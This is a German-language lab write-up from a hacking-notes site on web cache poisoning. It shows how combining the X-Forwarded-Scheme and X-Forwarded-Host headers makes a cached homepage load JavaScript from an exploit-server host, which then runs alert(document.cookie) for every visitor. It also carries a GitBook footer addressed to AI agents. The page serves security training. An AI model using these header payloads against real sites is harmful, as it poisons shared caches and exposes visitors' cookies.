> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/cache-poisoning/cache-poisoning-with-multiple-headers.md).

# Cache-Vergiftung mit mehreren Headern

### Web-Cache-Poisoning mit mehreren Headern

Diese Laborübung zeigt eine Schwachstelle zur Vergiftung des ausnutzbaren Web-Caches nur durch die Kombination mehrerer HTTP-Header. / Ein Benutzer besucht die Startseite etwa einmal pro Minute. / Das Ziel ist es, den Cache so zu vergiften, dass die Antwort im Browser des Opfers auslöst `alert(document.cookie)`.

**Erste Analyse**

* Abfangen der Anfrage an den Website-Root (`/`).
* Die Antwort scheint zwischengespeichert und für die folgenden Besucher wiederverwendet zu werden.

<figure><img src="/files/f019ffadfeae1f88c6c7f8d9fdf71b959565707b" alt=""><figcaption></figcaption></figure>

**Gefundene ausnutzbare Header**

* Verwendung der Erweiterung **Param Miner** um nicht indexierte Header zu erraten.

<figure><img src="/files/8232ce3dcb440422021b05a42ab0056ca1e73be8" alt=""><figcaption></figcaption></figure>

* Das Tool erkennt den Header **`X-Forwarded-Scheme`**.

<figure><img src="/files/90a6c87d54024511987f1cab36da4e4a92441f15" alt=""><figcaption></figcaption></figure>

**`X-Forwarded-Scheme` Test**

* Dieser Header gibt an, ob die Anfrage als von HTTP oder HTTPS stammend behandelt wird.
* Senden:

```http
X-Forwarded-Scheme: http
```

* Die Website versucht, sich so zu verhalten, als würde sie über HTTP bereitgestellt.

<figure><img src="/files/18bc0b50a436dff7cbc089e569ed509759196661" alt=""><figcaption></figcaption></figure>

Dies führt zu Fehlfunktionen, und Ressourcen werden aufgrund falscher Weiterleitungen nicht mehr korrekt geladen.

<figure><img src="/files/3beb651f0d61c92e2430b2db1ee28787665de464" alt=""><figcaption></figcaption></figure>

**Fügen Sie einen zweiten Header hinzu: `X-Forwarded-Host`**

```http
X-Forwarded-Host: test.com
```

* Die Website versucht dann, ihre Ressourcen von diesem Bereich zu laden.

<figure><img src="/files/1a0bb1748bf6f7153967218ef965fc98d716f1a1" alt=""><figcaption></figcaption></figure>

Das Laden der JavaScript-Datei umfasst:

Dieses Skript wird beim Laden der Seite automatisch ausgeführt.

<figure><img src="/files/3c9eb26ba4047139ca48e12bbd8d619eb642bd30" alt=""><figcaption></figcaption></figure>

**Vorgehen mit Exploit-Server**

* Das Ziel ist, das Laden der JavaScript-Datei vom Exploit-Server zu erzwingen.

```http
X-Forwarded-Scheme: http
X-Forwarded-Host: exploit-0a3a002204e750ae80a9206c011700a8.exploit-server.net/exploit
```

Auf dem Exploit-Server:

* Erstellen Sie eine Datei, die unter der URL erreichbar ist:

Dateiinhalt:

```javascript
alert(document.cookie)
```

<figure><img src="/files/60bcdda0dbc53c13176c1d9caa911ec57d6f4fba" alt=""><figcaption></figcaption></figure>

**Ergebnis**

* Die Startseite lädt nun das JavaScript-Skript vom Exploit-Server.

<figure><img src="/files/e03be49cd36a5d852020e3983827013050b586fc" alt=""><figcaption></figcaption></figure>

* Die vergiftete Antwort ist verborgen.
* Wenn ein Benutzer die Seite besucht, wird das Skript automatisch ausgeführt.
* Ein Alert, der `document.cookie` erscheint im Browser des Opfers.

<figure><img src="/files/f290ab24d2518f758df3c80968cb0fc051739557" alt="" width="427"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/cache-poisoning/cache-poisoning-with-multiple-headers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
